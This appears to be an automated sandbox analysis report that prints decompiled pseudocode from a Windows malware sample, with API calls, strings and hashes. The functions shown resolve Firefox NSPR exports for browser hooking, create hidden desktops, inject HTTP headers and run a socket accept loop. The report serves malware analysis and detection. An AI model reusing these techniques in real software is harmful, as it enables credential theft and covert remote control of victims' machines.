EnterCriticalSection.KERNEL32(00422A30), ref: 00408F38
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00408F52
LeaveCriticalSection.KERNEL32(00422A30), ref: 00408F73

Strings

0*B, xrefs: 00408F32
nspr4.dll, xrefs: 00408F4C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
String ID: 0*B$nspr4.dll
API String ID: 2984399785-4173039483
Opcode ID: 1728b1b49ff3624a2aa959e0a6d5b038b3b15f903c9046b48c4a7aa407b39046
Instruction ID: e34f16f477125192efd8ee46c6f053d35c335defeed92a682875ad7a9a31df68
Opcode Fuzzy Hash: 1728b1b49ff3624a2aa959e0a6d5b038b3b15f903c9046b48c4a7aa407b39046
Instruction Fuzzy Hash: 8D11BF31200216BBDB205F21AE44BA73F69AF45754F14403EFD81B62A1CBB8D952C69C

Uniqueness

Uniqueness Score: -1.00%

Function 004073F7, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004073F7(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x422a24 =  *0x422a24 & 0x00000000;
				 *0x422a28 =  *0x422a28 & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x422a08);
				 *0x422a20 = _a4;
				 *0x4229fc = _a8;
				 *0x422a2c = _a12;
				 *0x422a00 = _t14;
				 *0x42252c = _a16;
				 *0x422424 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x422a04 = GetProcAddress( *0x422a00, "PR_SetError");
				_t12 = GetProcAddress( *0x422a00, "PR_GetError");
				 *0x4223bc = _t12;
				return _t12;
			}

0x004073f7
0x004073fe
0x0040740b
0x0040740d
0x00407417
0x00407420
0x0040742e
0x00407437
0x00407444
0x00407456
0x00407468
0x0040746d
0x0040746f
0x00407475

APIs

InitializeCriticalSection.KERNEL32(00422A08,75144EE0,00419AC8,00422348), ref: 0040740D
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407449
GetProcAddress.KERNEL32(PR_SetError), ref: 0040745B
GetProcAddress.KERNEL32(PR_GetError), ref: 0040746D

Strings

PR_SetError, xrefs: 0040744B
PR_GetError, xrefs: 0040745D
PR_GetNameForIdentity, xrefs: 00407429

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 700d4efdef33aa21fa67a3d91914f83c17a6ae6a71b61448c471f3f395f202df
Instruction ID: dce05ddf009d39d1ae17dd671f496cf26685223c5d49e89d429e3e9bfdd2d140
Opcode Fuzzy Hash: 700d4efdef33aa21fa67a3d91914f83c17a6ae6a71b61448c471f3f395f202df
Instruction Fuzzy Hash: 47018CB5B15350AFC731DF65AE09B057FE4A708361B808A6AE845A3A60D7B495428F4C

Uniqueness

Uniqueness Score: -1.00%

Function 00404C77, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404C77(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E00412040( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E00414A4A(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E00414DBC(_t109, _t63);
					E00414D7A(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E00418059(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E00406312(0x2937498d,  &_v1028, 0);
						_t63 = E004090BA(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E0041A756(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E0041A9C1( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E00419DD3(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E00417246( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E00411A74( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E00413288( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x41ac8a;
								_v1124 = E0041ABD0;
								_v1120 = E0041ABD3;
								_v1116 = E0041ABF7;
								_v1112 = E0041AC3E;
								_v1108 = E0041AC73;
								_v1104 = 0x41ac8a;
								E0041115E(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E00409E70(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E00414BBD(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E00414A09( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E00414D64(E00414D64(_t63, _v1156), _v1152);
						E004119C1(_t105);
						return 0;
					} else {
						E00414DBC(_t108, _t63);
						goto L4;
					}
				}
			}

0x00404c77
0x00404c84
0x00404c87
0x00404c8a
0x00404c8b
0x00404c8f
0x00404c93
0x00404c99
0x00404cdf
0x00404ce6
0x00404ceb
0x00404cf0
0x00404cf5
0x00404cf9
0x00404cfb
0x00000000
0x00000000
0x00404d02
0x00404d0b
0x00404d13
0x00404d14
0x00404d16
0x00404d1c
0x00404d24
0x00000000
0x00000000
0x00404d2a
0x00404d30
0x00404d63
0x00404d79
0x00404d86
0x00404d8b
0x00404d8d
0x00000000
0x00000000
0x00404d9c
0x00404da1
0x00404da3
0x00404ecf
0x00404ed8
0x00000000
0x00404da9
0x00404da9
0x00404daf
0x00404db1
0x00404db6
0x00404dbb
0x00404dca
0x00404dcf
0x00404ddc
0x00404de2
0x00404de4
0x00404df1
0x00404df6
0x00404df8
0x00404dfc
0x00404e04
0x00404e10
0x00404e28
0x00404e2c
0x00404e31
0x00404e33
0x00404e3e
0x00404e4e
0x00404e54
0x00404e56
0x00404e56
0x00404e33
0x00404df8
0x00404de4
0x00404e63
0x00404e69
0x00404e6e
0x00404e85
0x00404e92
0x00404e9a
0x00404ea2
0x00404eaa
0x00404eb2
0x00404eba
0x00404ec2
0x00404eca
0x00404eca
0x00000000
0x00404e6e
0x00404d32
0x00404d35
0x00404d50
0x00404d37
0x00404d37
0x00404d3f
0x00404d44
0x00404d44
0x00000000
0x00404d35
0x00404ca0
0x00404ca6
0x00404ca7
0x00404cb0
0x00404cbb
0x00404cc0
0x00404cc8
0x00404ccd
0x00404cd3
0x00404edd
0x00404eea
0x00404ef0
0x00404efd
0x00404cd9
0x00404cda
0x00000000
0x00404cda
0x00404cd3

APIs

Part of subcall function 00414A09: socket.WS2_32(?,00000001,00000006), ref: 00414A12
Part of subcall function 00414A09: connect.WS2_32(00000000,?,-0000001D), ref: 00414A32
Part of subcall function 00414A09: closesocket.WS2_32(00000000), ref: 00414A3D

Part of subcall function 00414DBC: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00414DD2

GetCurrentThread.KERNEL32 ref: 00404D5C
SetThreadPriority.KERNEL32(00000000), ref: 00404D63

Part of subcall function 004090BA: OpenWindowStationW.USER32(?,00000000,10000000), ref: 004090DF
Part of subcall function 004090BA: CreateWindowStationW.USER32 ref: 004090F2
Part of subcall function 004090BA: GetProcessWindowStation.USER32(?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409103
Part of subcall function 004090BA: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040913E
Part of subcall function 004090BA: CreateDesktopW.USER32 ref: 00409152
Part of subcall function 004090BA: GetCurrentThreadId.KERNEL32 ref: 0040915E
Part of subcall function 004090BA: GetThreadDesktop.USER32(00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409165
Part of subcall function 004090BA: SetThreadDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409177
Part of subcall function 004090BA: CloseDesktop.USER32(00000000,00000000,00000000,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 00409189
Part of subcall function 004090BA: CloseWindowStation.USER32(?,?,?,?,?,00404D8B,?,2937498D,?,00000000), ref: 004091A4

Part of subcall function 0041A756: TlsAlloc.KERNEL32(00423E78,00000000,0000018C,00000000,00000000), ref: 0041A76F

GetShellWindow.USER32 ref: 00404DA9
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 00404DDC

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 00404E3E
CloseHandle.KERNEL32(?), ref: 00404E4E
CloseHandle.KERNEL32(?), ref: 00404E54
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 00404E63

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
String ID:
API String ID: 1240616959-0
Opcode ID: 08446fca2da731aee2e5a9d89ad29eb97459b05071a3faf713fe6440683d49f6
Instruction ID: 646031c6c670183ebd8a368c66c6c1512d7abbe41db1ba90d109c3e452f8bd97
Opcode Fuzzy Hash: 08446fca2da731aee2e5a9d89ad29eb97459b05071a3faf713fe6440683d49f6
Instruction Fuzzy Hash: DD61B3B00083459FD720EF65C844E9FBBE8AFC5704F04492EF694A72A1D778D845CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD84, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BD84(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				if(E0041BC69( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E00419364( &_v76);
					return _v120;
				}
				_t85 = E00418A36( &_v76);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x423df4;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E0041B2EB(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E004119C1( *((intOrPtr*)(_t148 +  *0x423d8c + 8)));
							 *((intOrPtr*)(_t148 +  *0x423d8c + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E0041B311(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E00419D9D(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E00419D9D(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E00419D9D(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x423df4;
						EnterCriticalSection(0x423df4);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E004193CE(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E0041364E(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E0041B2EB(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t142 = _t107 * 0x24;
							E004193CE( *((intOrPtr*)( *0x423d8c + _t142 + 0x10)),  *((intOrPtr*)( *0x423d8c + _t142 + 0xc)));
							E004119C1( *(_t142 +  *0x423d8c + 0x14));
							 *(_t142 +  *0x423d8c + 0x14) =  *(_t142 +  *0x423d8c + 0x14) & 0x00000000;
							 *(_t142 +  *0x423d8c + 0x1c) =  *(_t142 +  *0x423d8c + 0x1c) & 0x00000000;
							 *(_t142 +  *0x423d8c + 0x18) =  *(_t142 +  *0x423d8c + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t142 +  *0x423d8c + 0xc)) = _v76;
							 *((intOrPtr*)(_t142 +  *0x423d8c + 0x10)) = _v72;
							 *((intOrPtr*)(_t142 +  *0x423d8c + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E0041B311(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E00419629(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x0041bd90
0x0041bdad
0x0041bf95
0x0041bf99
0x0041bfa8
0x0041bfa8
0x0041bdb6
0x0041bdbe
0x0041bdc4
0x0041bddb
0x0041bddd
0x0041bf30
0x0041bf35
0x0041bf35
0x0041bf3a
0x00000000
0x00000000
0x0041bf43
0x0041bf4d
0x0041bf4f
0x0041bf55
0x0041bf58
0x0041bf5d
0x0041bf60
0x0041bf6d
0x0041bf74
0x0041bf74
0x0041bf7b
0x0041bf8a
0x0041bf8e
0x0041bf8f
0x00000000
0x0041bf8f
0x0041bf63
0x0041bf68
0x0041bf6b
0x00000000
0x00000000
0x00000000
0x0041bf6b
0x0041bde3
0x0041bde8
0x0041bdec
0x0041bdf0
0x0041be18
0x0041be1a
0x0041be1e
0x0041be1f
0x0041be37
0x0041be3b
0x0041be3f
0x0041be40
0x0041be53
0x0041be57
0x0041be5b
0x0041be5c
0x0041be6a
0x0041be6c
0x0041be6c
0x0041be72
0x0041be78
0x0041be7d
0x0041bf07
0x0041bf12
0x0041bf17
0x0041bf1c
0x0041bf22
0x0041bf22
0x0041bf27
0x0041bf28
0x00000000
0x0041bf28
0x0041be83
0x0041be86
0x0041be8b
0x0041be8e
0x0041be9b
0x0041bea2
0x0041bead
0x0041bebb
0x0041bec5
0x0041becf
0x0041bed9
0x0041bee7
0x0041bef4
0x0041bf01
0x00000000
0x0041bf01
0x0041be91
0x0041be96
0x0041be99
0x00000000
0x00000000
0x00000000
0x0041be99
0x0041bdf2
0x0041bdf6
0x0041bdf9
0x00000000
0x00000000
0x0041bdff
0x0041be04
0x0041be08
0x0041be0a
0x0041be12
0x0041be0c
0x0041be0c
0x0041be0c
0x00000000
0x0041bdc6
0x0041bdcb
0x0041bdd1
0x00000000
0x0041bdd1

APIs

Part of subcall function 00418A36: EnterCriticalSection.KERNEL32(00423C6C,-00422A24,00000000,00422A08), ref: 00418A51
Part of subcall function 00418A36: LeaveCriticalSection.KERNEL32(00423C6C), ref: 00418AD4

SetLastError.KERNEL32(00002F78,?), ref: 0041BDCB
EnterCriticalSection.KERNEL32(00423DF4), ref: 0041BE72
LeaveCriticalSection.KERNEL32(00423DF4,?), ref: 0041BF28
EnterCriticalSection.KERNEL32(00423DF4,?), ref: 0041BF4F
LeaveCriticalSection.KERNEL32(00423DF4,?), ref: 0041BF8F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: d7dcdf860aeddf9c22bfd593f377fa0d4760d4006f883135a9b5284ffcf21345
Instruction ID: fd6646fdee0a2a48310b94ac3a45c11e5847c2a65a978d3a44bd755c81b522d0
Opcode Fuzzy Hash: d7dcdf860aeddf9c22bfd593f377fa0d4760d4006f883135a9b5284ffcf21345
Instruction Fuzzy Hash: 3A518130614301DBC721DF29DC85A9ABBE5FB45368F104A1EF960972B1C738ED96CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041D5CB, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041D5CB(void* __ecx, void* __eflags) {
				intOrPtr _v74;
				signed int _v78;
				char _v124;
				char _v128;
				long _v140;
				void* _v144;
				intOrPtr _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				char _v164;
				void* _v168;
				signed int _v172;
				long _v184;
				void* __esi;
				void* _t47;
				long _t48;
				void* _t49;
				void* _t55;
				long _t56;
				long _t57;
				long _t59;
				intOrPtr _t64;
				long _t65;
				long _t69;
				void* _t72;
				long _t77;
				signed int _t83;
				intOrPtr* _t85;
				signed int _t94;
				long _t97;
				signed int _t98;
				void* _t100;

				_t100 = (_t98 & 0xfffffff8) - 0xac;
				_t83 = 2;
				_t47 = E0040634D(__ecx, __eflags, 0x743c152e, _t83);
				_v156 = _t47;
				if(_t47 != 0) {
					_t48 = E00406473();
					__eflags = _t48;
					if(_t48 == 0) {
						L26:
						E00415194(_v148);
						_t49 = 0;
						__eflags = 0;
						L27:
						return _t49;
					}
					E00419C2A(__ecx,  &_v124);
					_t87 = _v78;
					_t94 = E0041D476( &_v160, _v78,  &_v168) & 0x0000ffff;
					__eflags = _t94;
					if(_t94 != 0) {
						L7:
						__eflags = _t94 - _v74;
						if(_t94 != _v74) {
							E00419CE5( &_v124);
							_v78 = _t94;
							E00419D3D( &_v128);
						}
						_t55 =  *0x4229f4; // 0x0
						_v144 = _t55;
						_t56 = _v152;
						_v172 = 1;
						__eflags = _t56;
						if(_t56 != 0) {
							_v140 = _t56;
							_v172 = _t83;
						}
						_t57 = _v160;
						__eflags = _t57;
						if(_t57 != 0) {
							_t87 = _v172;
							_t20 =  &_v172;
							 *_t20 = _v172 + 1;
							__eflags =  *_t20;
							 *(_t100 + 0x2c + _v172 * 4) = _t57;
						}
						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
						__eflags = _t59;
						if(_t59 <= 0) {
							L25:
							E00414D64(_t59, _v156);
							E00414D64(CloseHandle(_v152), _v164);
							CloseHandle(_v160);
							goto L26;
						} else {
							_t85 = __imp__#1;
							while(1) {
								__eflags = _t59 - _v172;
								if(_t59 >= _v172) {
									goto L25;
								}
								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
								__eflags = _t64 - _v152;
								if(_t64 != _v152) {
									__eflags = _t64 - _v160;
									if(_t64 != _v160) {
										while(1) {
											L23:
											_t65 =  *_t85(_v168, 0, 0);
											_t97 = _t65;
											__eflags = _t97 - 0xffffffff;
											if(_t97 == 0xffffffff) {
												break;
											}
											__imp__WSAEventSelect(_t97, 0, 0);
											_v156 = 0;
											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
											E00414DBC(_t87, _t97);
											_t69 = E004133F6(0x20000, E0041D4FE, _t97);
											__eflags = _t69;
											if(_t69 == 0) {
												E00414D64(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										__eflags = _t59;
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t77 = WaitForSingleObject( *0x4229f4, 0x3e8);
						__eflags = _t77 - 0x102;
						if(_t77 != 0x102) {
							break;
						}
						_t87 = _v74;
						_t94 = E0041D476( &_v156, _v74,  &_v164) & 0x0000ffff;
						__eflags = _t94;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					__eflags = _t94;
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}

0x0041d5d1
0x0041d5dc
0x0041d5e3
0x0041d5ea
0x0041d5f0
0x0041d5fa
0x0041d5ff
0x0041d601
0x0041d799
0x0041d79d
0x0041d7a2
0x0041d7a2
0x0041d7a4
0x0041d7aa
0x0041d7aa
0x0041d60c
0x0041d611
0x0041d623
0x0041d626
0x0041d629
0x0041d666
0x0041d666
0x0041d66b
0x0041d672
0x0041d67c
0x0041d681
0x0041d681
0x0041d686
0x0041d68b
0x0041d68f
0x0041d693
0x0041d69b
0x0041d69d
0x0041d69f
0x0041d6a3
0x0041d6a3
0x0041d6a7
0x0041d6ab
0x0041d6ad
0x0041d6af
0x0041d6b3
0x0041d6b3
0x0041d6b3
0x0041d6b7
0x0041d6b7
0x0041d6c7
0x0041d6cd
0x0041d6cf
0x0041d775
0x0041d779
0x0041d78e
0x0041d797
0x00000000
0x0041d6d5
0x0041d6d5
0x0041d6db
0x0041d6db
0x0041d6df
0x00000000
0x00000000
0x0041d6e5
0x0041d6e9
0x0041d6ed
0x0041d6f5
0x0041d6f9
0x0041d74d
0x0041d74d
0x0041d753
0x0041d755
0x0041d757
0x0041d75a
0x00000000
0x00000000
0x0041d708
0x0041d724
0x0041d728
0x0041d72f
0x0041d73f
0x0041d744
0x0041d746
0x0041d748
0x0041d748
0x0041d746
0x0041d767
0x0041d76d
0x0041d76f
0x00000000
0x00000000
0x00000000
0x0041d76f
0x0041d6fb
0x0041d6ff
0x0041d6ff
0x00000000
0x0041d6ff
0x0041d6ef
0x00000000
0x0041d6ef
0x00000000
0x0041d6db
0x00000000
0x00000000
0x00000000
0x0041d62b
0x0041d62b
0x0041d636
0x0041d63c
0x0041d641
0x00000000
0x00000000
0x0041d643
0x0041d655
0x0041d658
0x0041d65b
0x00000000
0x00000000
0x00000000
0x0041d65b
0x0041d65d
0x0041d660
0x00000000
0x00000000
0x00000000
0x0041d660
0x0041d5f4
0x00000000

APIs

Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0041D636
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0041D6C7
accept.WS2_32(?,00000000,00000000), ref: 0041D753
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0041D767
CloseHandle.KERNEL32(?), ref: 0041D788
CloseHandle.KERNEL32(?), ref: 0041D797

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
String ID:
API String ID: 38240579-0
Opcode ID: 3b62a46ca0a68407ab22b8957941c204bd33eaa751af0d31905e965f3c0b9fbf
Instruction ID: 40d16d01c95f5adcfcc1ddc72d123b8e1dc3e4b0d49b5107b602049f3dc79de5
Opcode Fuzzy Hash: 3b62a46ca0a68407ab22b8957941c204bd33eaa751af0d31905e965f3c0b9fbf
Instruction Fuzzy Hash: 72518CB1908201ABC720EF65DD84CAFB7E9EBC5714F10092EF5A5E31A0D7349D85CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004082BE, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004082BE(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
